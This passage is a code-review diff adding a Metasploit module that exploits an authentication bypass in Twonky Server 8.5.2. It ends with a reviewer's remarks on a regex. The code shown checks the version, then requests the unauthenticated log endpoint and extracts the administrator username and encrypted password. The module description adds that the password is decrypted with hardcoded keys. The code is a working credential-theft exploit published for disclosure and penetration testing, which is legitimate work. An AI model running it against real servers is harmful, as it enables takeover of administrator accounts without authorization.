modules/auxiliary/gather/twonky_authbypass_logleak.rb

```diff
@@ -0,0 +1,154 @@
+          encrypted administrator credentials are leaked (CVE-2025-13315). The exploit will then decrypt
+          these credentials using hardcoded keys (CVE-2025-13316) and login as the administrator.
+          Expected module output is a username and plain text password for the administrator account.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'remmons-r7' # Initial discovery, MSF module
+        ],
+        'References' => [
+          ['CVE', '2025-13315'],
+          ['CVE', '2025-13316'],
+          ['URL', 'https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          # No IoCs, in logs or individual files, are known
+          # If a non-default reverse proxy is configured in front of Twonky Server, it may log web traffic
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(9000),
+        OptString.new('TARGETURI', [true, 'The URI path to Twonky Server', '/'])
+      ]
+    )
+  end
+
+  def run
+    # Unauthenticated requests to the '/dev0/desc.xml' endpoint should return the version number
+    print_status('Confirming the target is vulnerable')
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'dev0', 'desc.xml')
+      }
+    )
+
+    fail_with(Failure::Unknown, 'Connection failed - unable to get XML web response') unless res
+
+    # Confirm that the response contains the expected 8.5.2 XML string
+    if (res&.code != 200) || (!res.body.include? '<modelNumber>8.5.2</modelNumber>')
+      fail_with(Failure::NotVulnerable, 'The target does not appear to be a Twonky Server instance running version 8.5.2')
+    end
+
+    print_good('The target is Twonky Server v8.5.2')
+
+    print_status('Attempting to leak the administrator username and encrypted password')
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'nmc', 'rpc', 'log_getfile')
+      }
+    )
+
+    fail_with(Failure::Unknown, 'Connection failed - unable to get log API response') unless res
+
+    # Grab the most recent (last) administrator username value from the logs
+    pattern = /accessuser\s*=\s*(\S+)\n/
+    result = res.body.scan(pattern).last
+
+    # If the log has been cleared since startup or the server hasn't restarted since setup
+    fail_with(Failure::NotFound, 'The target did not return a log file containing a username value') unless result
+
+    username = result[0]
+
+    print_good("The target returned the administrator username: #{username}")
+
+    # Grab the most recent (last) password value from the logs to decrypt
+    # "||" + hex number (key index) + hex Blowfish ECB ciphertext
+    pattern = /\|\|([0-9A-F]){1}([a-fA-F0-9]{16}(?:[a-fA-F0-9]{4})*)\n/
```

Comment:
- No need to specify `{1}`
- To get the hex ciphertext, wouldn't something like `([a-fA-Z0-9]+)` work?